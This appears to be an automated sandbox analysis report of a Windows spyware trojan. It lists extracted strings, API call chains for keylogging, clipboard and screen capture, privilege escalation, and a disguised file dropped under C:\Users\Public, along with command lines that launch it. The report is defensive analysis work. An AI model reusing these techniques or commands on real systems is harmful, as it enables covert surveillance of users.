Source: PKHDJwnF0I.exe, AnyDesk.exe.0.dr, ShellExperienceHosts.exe.0.dr, yyzyBase.dll.0.dr, backup.exe.3.dr, backup.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: PKHDJwnF0I.exe, ShellExperienceHosts.exe.0.dr, yyzyBase.dll.0.dr, backup.exe.3.dr, backup.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: PKHDJwnF0I.exe, 00000000.00000003.1699462533.00000000030F6000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2407605582.000000000081F000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe.0.dr, ShellExperienceHosts.exe.0.dr, backup.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: PKHDJwnF0I.exe, AnyDesk.exe.0.dr, ShellExperienceHosts.exe.0.dr, yyzyBase.dll.0.dr, backup.exe.3.dr, backup.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: PKHDJwnF0I.exe, AnyDesk.exe.0.dr, ShellExperienceHosts.exe.0.dr, yyzyBase.dll.0.dr, backup.exe.3.dr, backup.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: powershell.exe, 00000010.00000002.2539232911.0000000007871000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mi
Source: PKHDJwnF0I.exe, AnyDesk.exe.0.dr, ShellExperienceHosts.exe.0.dr, yyzyBase.dll.0.dr, backup.exe.3.dr, backup.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: PKHDJwnF0I.exe, 00000000.00000003.1699462533.00000000030F6000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2407605582.000000000081F000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: PKHDJwnF0I.exe, ShellExperienceHosts.exe.0.dr, yyzyBase.dll.0.dr, backup.exe.3.dr, backup.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: PKHDJwnF0I.exe, 00000000.00000003.1699462533.00000000030F6000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2407605582.000000000081F000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe.0.dr, ShellExperienceHosts.exe.0.dr, backup.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: PKHDJwnF0I.exe, AnyDesk.exe.0.dr, ShellExperienceHosts.exe.0.dr, yyzyBase.dll.0.dr, backup.exe.3.dr, backup.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: backup.exe.3.dr, backup.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: PKHDJwnF0I.exe, 00000000.00000003.1699462533.00000000030F6000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2407605582.000000000081F000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: PKHDJwnF0I.exe, ShellExperienceHosts.exe.0.dr, yyzyBase.dll.0.dr, backup.exe.3.dr, backup.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: PKHDJwnF0I.exe, 00000000.00000003.1699462533.00000000030F6000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2407605582.000000000081F000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: PKHDJwnF0I.exe, ShellExperienceHosts.exe.0.dr, yyzyBase.dll.0.dr, backup.exe.3.dr, backup.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: PKHDJwnF0I.exe, 00000000.00000003.1699462533.00000000030F6000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2407605582.000000000081F000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe.0.dr, ShellExperienceHosts.exe.0.dr, backup.exe.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: PKHDJwnF0I.exe, 00000000.00000003.1699462533.00000000030F6000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2407605582.000000000081F000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.dr	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: PKHDJwnF0I.exe, yyzyBase.dll.0.dr, backup.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: PKHDJwnF0I.exe, 00000000.00000003.1699462533.00000000030F6000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2407605582.000000000081F000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: powershell.exe, 00000010.00000002.2520600729.000000000332A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.microsoftM
Source: powershell.exe, 00000010.00000002.2520600729.000000000332A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.microsoftMicrosoft.PowerShell.ODataAdapter.ps1
Source: powershell.exe, 00000010.00000002.2533631431.0000000006243000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2527198640.00000000056B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: PKHDJwnF0I.exe, 00000000.00000003.1699462533.00000000030F6000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2407605582.000000000081F000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe.0.dr, ShellExperienceHosts.exe.0.dr, backup.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: PKHDJwnF0I.exe, AnyDesk.exe.0.dr, ShellExperienceHosts.exe.0.dr, yyzyBase.dll.0.dr, backup.exe.3.dr, backup.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: PKHDJwnF0I.exe, AnyDesk.exe.0.dr, ShellExperienceHosts.exe.0.dr, yyzyBase.dll.0.dr, backup.exe.3.dr, backup.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: PKHDJwnF0I.exe, 00000000.00000003.1699462533.00000000030F6000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2407605582.000000000081F000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0L
Source: PKHDJwnF0I.exe, ShellExperienceHosts.exe.0.dr, yyzyBase.dll.0.dr, backup.exe.3.dr, backup.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: PKHDJwnF0I.exe, AnyDesk.exe.0.dr, ShellExperienceHosts.exe.0.dr, yyzyBase.dll.0.dr, backup.exe.3.dr, backup.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000011.00000002.2522179924.00000000047A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000010.00000002.2521861321.0000000005335000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2521861321.00000000059A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2522179924.00000000047A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000010.00000002.2521861321.00000000051E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2522179924.0000000004651000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000010.00000002.2521861321.0000000005335000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2521861321.00000000059A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2522179924.00000000047A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000011.00000002.2522179924.00000000047A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: PKHDJwnF0I.exe, AnyDesk.exe.0.dr, ShellExperienceHosts.exe.0.dr, yyzyBase.dll.0.dr, backup.exe.3.dr, backup.dll.3.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: PKHDJwnF0I.exe, 00000000.00000003.1699462533.00000000030F6000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2407605582.000000000081F000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: powershell.exe, 00000011.00000002.2535753815.0000000006FB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka..winsvr
Source: powershell.exe, 00000010.00000002.2521861321.00000000051E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2522179924.0000000004651000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000011.00000002.2522179924.00000000047A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000011.00000002.2527198640.00000000056B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.2527198640.00000000056B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.2527198640.00000000056B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000011.00000002.2522179924.00000000047A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000010.00000002.2533631431.0000000006243000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2527198640.00000000056B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: PKHDJwnF0I.exe, ShellExperienceHosts.exe.0.dr, yyzyBase.dll.0.dr, backup.exe.3.dr, backup.dll.3.dr	String found in binary or memory: https://www.digicert.com/CPS0

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture and log keystrokes

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: [esc]	3_2_032DE850
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: [esc]	3_2_032DE850
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: [esc]	3_2_032DE850
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: [esc]	3_2_032DE850

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Code function: 3_2_032DE850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,

3_2_032DE850

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

3_2_032DE850

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Code function: 3_2_032DBC70 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC,

3_2_032DBC70

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Code function: 3_2_6C9D677C GetPropW,GlobalLock,SendMessageW,GlobalUnlock,RemovePropW,GlobalFree,GlobalUnlock,GetAsyncKeyState,SendMessageW,

3_2_6C9D677C

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Code function: 3_2_032DE4F0 Sleep,CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState,

3_2_032DE4F0

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Windows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dll

Jump to behavior

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6C9DCCD9 ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,		3_2_6C9DCCD9
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6C9BA733 GetKeyState,GetKeyState,GetKeyState,SendMessageW,		3_2_6C9BA733

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Code function: 3_2_6C9A68B0 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,

3_2_6C9A68B0

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_032DB43F ExitWindowsEx,	3_2_032DB43F
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_032DB41B ExitWindowsEx,	3_2_032DB41B
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_032DB463 ExitWindowsEx,	3_2_032DB463

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_032D6EE0	3_2_032D6EE0
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_032D6C50	3_2_032D6C50
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_032EE341	3_2_032EE341
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_032E8381	3_2_032E8381
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_032EEA1D	3_2_032EEA1D
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_032D8900	3_2_032D8900
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_032EF9FF	3_2_032EF9FF
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_032ED89F	3_2_032ED89F
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_032EDDF0	3_2_032EDDF0
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_032D24B0	3_2_032D24B0
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6C9AE9F0	3_2_6C9AE9F0
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6C9A72B0	3_2_6C9A72B0
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6C9BAE1E	3_2_6C9BAE1E
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6C9CAE7F	3_2_6C9CAE7F
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6C9C8927	3_2_6C9C8927
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6CAFE975	3_2_6CAFE975
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6C9EA428	3_2_6C9EA428
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6C9CA729	3_2_6C9CA729
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6C9D6027	3_2_6C9D6027
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6C9F3C60	3_2_6C9F3C60
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6C9ABFE0	3_2_6C9ABFE0
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6CAF5824	3_2_6CAF5824
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6C9CB855	3_2_6C9CB855
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6CAF9AD0	3_2_6CAF9AD0
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6CB0D5A8	3_2_6CB0D5A8
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6CB195CE	3_2_6CB195CE
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6C9C564E	3_2_6C9C564E
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6CB011FF	3_2_6CB011FF
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_6CB03230	3_2_6CB03230
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_1001122F	3_2_1001122F
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_100024B0	3_2_100024B0
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_10010CDE	3_2_10010CDE
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_10012D91	3_2_10012D91
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_10011E5C	3_2_10011E5C
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_1000B66A	3_2_1000B66A
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_10011780	3_2_10011780
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_02B90032	3_2_02B90032
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_02BA1206	3_2_02BA1206
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_02B9B641	3_2_02B9B641
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_02BA1757	3_2_02BA1757
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_02BA0CB5	3_2_02BA0CB5
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_02B92487	3_2_02B92487
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_02BA2D68	3_2_02BA2D68
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_02C382BF	3_2_02C382BF
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_02C4D25E	3_2_02C4D25E
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_02C4F3BE	3_2_02C4F3BE
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_02C3689F	3_2_02C3689F
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_02C31E6F	3_2_02C31E6F
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_02C3660F	3_2_02C3660F
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_02C4D7AF	3_2_02C4D7AF
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_02C47D40	3_2_02C47D40
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_02C4DD00	3_2_02C4DD00

Source: Joe Sandbox View

Dropped File: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe 41F413DEBFE785B95D852A396AEFE1C814F3C13BDEDF85526F2DC4E83127D6CA

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: String function: 032E4300 appears 32 times
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: String function: 6CAF501B appears 64 times
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: String function: 6CAF4FE8 appears 200 times
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: String function: 6C9B5430 appears 39 times
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: String function: 6CAF50C0 appears 66 times
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: String function: 6C9D0DEA appears 44 times
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: String function: 6CAF4C00 appears 66 times

Source: AnyDesk.exe.0.dr

Static PE information: No import functions for PE file found

Source: PKHDJwnF0I.exe, 00000000.00000000.1688466902.0000000000442000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameEasiNote.dll6 vs PKHDJwnF0I.exe
Source: PKHDJwnF0I.exe, 00000000.00000000.1688466902.0000000000442000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileNameosprovision.exe` vs PKHDJwnF0I.exe
Source: PKHDJwnF0I.exe, 00000000.00000003.1700975853.0000000003800000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameYSS.exe8 vs PKHDJwnF0I.exe
Source: PKHDJwnF0I.exe, 00000000.00000003.1689414178.00000000021E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameEasiNote.dll6 vs PKHDJwnF0I.exe
Source: PKHDJwnF0I.exe, 00000000.00000003.1689414178.00000000021E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameosprovision.exe` vs PKHDJwnF0I.exe
Source: PKHDJwnF0I.exe, 00000000.00000003.1699462533.00000000030F6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameYSS.exe8 vs PKHDJwnF0I.exe
Source: PKHDJwnF0I.exe	Binary or memory string: OriginalFilenameEasiNote.dll6 vs PKHDJwnF0I.exe
Source: PKHDJwnF0I.exe	Binary or memory string: OriginalFileNameosprovision.exe` vs PKHDJwnF0I.exe

Source: PKHDJwnF0I.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: ShellExperienceHosts.exe.0.dr	Static PE information: Section: .tp6 ZLIB complexity 1.000637755102041
Source: backup.exe.3.dr	Static PE information: Section: .tp6 ZLIB complexity 1.000637755102041

Source: AnyDesk.exe.0.dr

Binary or memory string: K.sLn}

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@43/28@0/1

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_032D7B70 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,	3_2_032D7B70
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_032D7740 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,	3_2_032D7740
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Code function: 3_2_032D7620 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess,	3_2_032D7620

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Code function: 3_2_032D6C50 wsprintfW,MultiByteToWideChar,GetDriveTypeW,GetDiskFreeSpaceExW,_memset,GlobalMemoryStatusEx,swprintf,swprintf,

3_2_032D6C50

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Code function: 3_2_032D6050 _memset,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,CloseHandle,

3_2_032D6050

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Code function: 3_2_032D6150 wsprintfW,_memset,lstrcatW,lstrcatW,lstrcatW,CoCreateInstance,wsprintfW,RegOpenKeyExW,_memset,wsprintfW,RegOpenKeyExW,_memset,RegQueryValueExW,lstrcatW,lstrcatW,lstrcatW,RegCloseKey,lstrlenW,lstrcatW,

3_2_032D6150

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Code function: 3_2_6C9B2900 GetModuleHandleA,FindResourceW,LoadResource,SizeofResource,LockResource,

3_2_6C9B2900

Source: C:\Users\user\Desktop\PKHDJwnF0I.exe

File created: C:\Users\Public\Bulete

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5944:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5752:120:WilError_03
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe	Mutant created: \Sessions\1\BaseNamedObjects\2024.12. 8

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

File created: C:\Users\user\AppData\Local\Temp\monitor.bat

Jump to behavior

Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"

Source: PKHDJwnF0I.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SHELLEXPERIENCEHOSTS.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SHELLEXPERIENCEHOSTS.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SHELLEXPERIENCEHOSTS.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SHELLEXPERIENCEHOSTS.EXE'

Source: C:\Users\user\Desktop\PKHDJwnF0I.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PKHDJwnF0I.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: PKHDJwnF0I.exe

ReversingLabs: Detection: 55%

Source: C:\Users\user\Desktop\PKHDJwnF0I.exe

File read: C:\Users\user\Desktop\PKHDJwnF0I.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PKHDJwnF0I.exe "C:\Users\user\Desktop\PKHDJwnF0I.exe"
Source: C:\Users\user\Desktop\PKHDJwnF0I.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
